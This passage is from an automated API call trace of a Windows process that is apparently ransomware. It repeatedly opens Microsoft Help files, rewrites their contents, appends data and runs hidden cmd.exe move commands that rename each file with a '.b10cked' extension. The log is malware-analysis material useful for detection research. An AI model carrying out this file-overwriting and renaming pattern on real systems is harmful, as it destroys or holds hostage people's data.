lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSOU~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSOUC.14.1033.hxn.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xc2c, dwThreadId=0xcb4)) returned 1 [0197.883] CloseHandle (hObject=0x1b4) returned 1 [0197.883] CloseHandle (hObject=0x120) returned 1 
[0197.883] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0197.883] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0197.883] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0197.883] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.883] ReleaseMutex (hMutex=0xf8) returned 1 [0197.883] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.883] ReleaseMutex (hMutex=0xf8) returned 1 [0197.883] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.883] ReleaseMutex (hMutex=0xf8) returned 1 [0197.883] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.883] ReleaseMutex (hMutex=0xf8) returned 1 [0197.883] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.mspub.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0197.916] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.916] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.916] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.916] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: 
lpPerformanceCount=0x12ed38*=25470544820) returned 1 [0197.916] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.916] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.916] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.916] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.916] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.916] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.917] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0197.917] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x146 [0197.917] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0197.917] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.917] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.917] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.917] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.917] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.917] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.917] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.917] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.917] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.917] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.917] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.917] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.917] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.917] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.917] SetFilePointer (in: 
hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.917] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.917] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.917] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.918] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0197.918] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x146 [0197.918] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0197.918] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0197.918] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0197.918] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x146 [0197.918] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0197.918] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 
[0197.918] ReadFile (in: hFile=0x120, lpBuffer=0x12f4da8, nNumberOfBytesToRead=0xa2, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x12f4da8*, lpNumberOfBytesRead=0x12ec08*=0xa2, lpOverlapped=0x0) returned 1 [0197.919] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0197.919] WriteFile (in: hFile=0x120, lpBuffer=0x12f4da8*, nNumberOfBytesToWrite=0xa2, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x12f4da8*, lpNumberOfBytesWritten=0x12ec1c*=0xa2, lpOverlapped=0x0) returned 1 [0197.919] SetFilePointer (in: hFile=0x120, lDistanceToMove=-162, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xa4 [0197.919] ReadFile (in: hFile=0x120, lpBuffer=0x12f4da8, nNumberOfBytesToRead=0xa2, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x12f4da8*, lpNumberOfBytesRead=0x12ec08*=0xa2, lpOverlapped=0x0) returned 1 [0197.919] SetFilePointer (in: hFile=0x120, lDistanceToMove=-162, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xa4 [0197.919] WriteFile (in: hFile=0x120, lpBuffer=0x12f4da8*, nNumberOfBytesToWrite=0xa2, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x12f4da8*, lpNumberOfBytesWritten=0x12ec1c*=0xa2, lpOverlapped=0x0) returned 1 [0197.923] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.MSPUB.14.1033.hxn", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0197.923] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.MSPUB.14.1033.hxn", cchWideChar=20, lpMultiByteStr=0x1328794, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.MSPUB.14.1033.hxn", lpUsedDefaultChar=0x0) returned 20 [0197.923] SetFilePointer 
(in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x146 [0197.923] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0197.923] CloseHandle (hObject=0x120) returned 1 [0197.924] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~1.HXN") returned 0x27 [0197.925] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0197.925] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSPUB.14.1033.hxn.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSPUB.14.1033.hxn.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xcc8, dwThreadId=0xd24)) returned 1 [0198.037] CloseHandle (hObject=0x1b4) returned 1 [0198.037] CloseHandle (hObject=0x120) returned 1 [0198.037] CharUpperBuffW (in: lpsz="C:\\Users\\All 
Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0198.037] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0198.037] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0198.037] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.038] ReleaseMutex (hMutex=0xf8) returned 1 [0198.038] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.038] ReleaseMutex (hMutex=0xf8) returned 1 [0198.038] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.038] ReleaseMutex (hMutex=0xf8) returned 1 [0198.038] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.038] ReleaseMutex (hMutex=0xf8) returned 1 [0198.038] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.mspub.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0198.038] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.038] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0198.038] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.039] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25482773786) returned 1 [0198.039] 
SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.039] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0198.039] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.039] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.039] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0198.039] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.039] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0198.039] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x15e [0198.039] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0198.039] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.039] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0198.039] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) 
returned 0x0 [0198.039] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.039] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0198.039] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.039] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.039] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0198.039] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.039] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.039] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0198.040] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.040] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.040] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0198.040] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.040] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.040] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0198.040] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.040] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0198.041] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x15e [0198.041] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0198.041] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0198.041] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0198.041] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x15e [0198.041] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0198.041] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0198.041] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xae, 
lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xae, lpOverlapped=0x0) returned 1 [0198.042] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0198.042] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xae, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xae, lpOverlapped=0x0) returned 1 [0198.042] SetFilePointer (in: hFile=0x120, lDistanceToMove=-174, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xb0 [0198.042] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xae, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xae, lpOverlapped=0x0) returned 1 [0198.042] SetFilePointer (in: hFile=0x120, lDistanceToMove=-174, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xb0 [0198.042] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xae, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xae, lpOverlapped=0x0) returned 1 [0198.050] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.MSPUB.DEV.14.1033.hxn", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0198.050] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.MSPUB.DEV.14.1033.hxn", cchWideChar=24, lpMultiByteStr=0x132f75c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.MSPUB.DEV.14.1033.hxn", lpUsedDefaultChar=0x0) returned 24 [0198.050] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, 
dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x15e [0198.050] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0198.051] CloseHandle (hObject=0x120) returned 1 [0198.056] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~2.HXN") returned 0x27 [0198.059] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0198.059] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSPUB.DEV.14.1033.hxn.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, 